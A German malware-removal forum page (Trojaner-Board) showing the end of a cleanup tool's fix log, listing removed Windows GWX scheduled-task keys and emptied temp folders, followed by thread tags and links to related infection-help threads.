HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{749258DE-50AA-45E3-A106-4D57EA1939D4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{749258DE-50AA-45E3-A106-4D57EA1939D4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DB66428E-B85F-4EDD-BC33-43CAA577BBCA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB66428E-B85F-4EDD-BC33-43CAA577BBCA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FDC309C3-7CAB-43AD-8822-78E3C63B88B4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FDC309C3-7CAB-43AD-8822-78E3C63B88B4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => Schlüssel erfolgreich entfernt

=========== EmptyTemp: ==========

BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15107038 B
Java, Flash, Steam htmlcache => 682660468 B
Windows/system/drivers => 49826 B
Edge => 1498 B
Chrome => 26815042 B
Firefox => 4030740 B
Opera => 119808 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 4440 B
Martin Walser => 33398127 B

RecycleBin => 11136170 B
EmptyTemp: => 745 MB temporäre Dateien entfernt.

================================

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 10-08-2017 18:11:25)


Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel erfolgreich entfernt

==== Ende vom Fixlog 18:11:26 ====
         

Geändert von Lost_Viking (10.08.2017 um 16:59 Uhr)

Antwort

Themen zu UPC meldet: Virus, würmer werden über meine IP versendet
bot, conficker, direkt, erhalte, eröffnet, guten, log, lokal, malware, meldet, namen, neue, neuen, nicht mehr, problem, recovery, scan, sicherheitslücke, thread, tool, trojaner, virus, welchem, wurm, würmer



Ähnliche Themen: UPC meldet: Virus, würmer werden über meine IP versendet


  1. Windows 7: E-Mails werden unter meinem Namen, mit falscher Adresse an meine Kontakte versendet
    Plagegeister aller Art und deren Bekämpfung - 18.05.2016 (4)
  2. Spam über meinen web.de Account versendet - Mails nur über MacBook und iPhone abgerufen
    Alles rund um Mac OSX & Linux - 02.12.2015 (11)
  3. Über meine Mail-Adreße wird Spam versendet
    Plagegeister aller Art und deren Bekämpfung - 15.01.2014 (11)
  4. Spammails werden über meine Emailadresse verschickt!
    Log-Analyse und Auswertung - 04.08.2013 (7)
  5. Meine Identität wurde über meine IP festgestellt?
    Log-Analyse und Auswertung - 13.02.2013 (5)
  6. locked- , meine Dateien sind locked---virus- trojaner-würmer ?
    Plagegeister aller Art und deren Bekämpfung - 10.06.2012 (1)
  7. Spambot verschickt meine über meine Emailadresse
    Log-Analyse und Auswertung - 23.12.2011 (1)
  8. Über meine Email werden Spam verschickt
    Log-Analyse und Auswertung - 16.12.2011 (1)
  9. Antivir meldet zwei Würmer
    Plagegeister aller Art und deren Bekämpfung - 28.01.2011 (10)
  10. Spam-Mails über meine Mail-Adresse auf meine Kontakte geschickt!
    Log-Analyse und Auswertung - 28.11.2010 (1)
  11. Über meine email-Adresse wurde Spam an Kontakte versendet! Malware gefunden!
    Log-Analyse und Auswertung - 16.11.2010 (12)
  12. Spam über meine email Adresse versendet
    Log-Analyse und Auswertung - 17.10.2010 (1)
  13. Über IP-Adresse werden Spammails versendet, T-Online beschränkt Mailversand
    Überwachung, Datenschutz und Spam - 05.07.2010 (1)
  14. Spamm über meine Emailadresse versendet!
    Log-Analyse und Auswertung - 25.01.2010 (1)
  15. Was kann ich tun? Meine Bekannte hat Würmer auf dem Rechner....
    Plagegeister aller Art und deren Bekämpfung - 12.07.2005 (1)
  16. Würmer über Würmer
    Plagegeister aller Art und deren Bekämpfung - 10.11.2004 (4)
  17. AV meldet würmer und trojaner
    Log-Analyse und Auswertung - 29.10.2004 (4)

Zum Thema UPC meldet: Virus, würmer werden über meine IP versendet - *up* - UPC meldet: Virus, würmer werden über meine IP versendet...
Archiv
Du betrachtest: UPC meldet: Virus, würmer werden über meine IP versendet auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.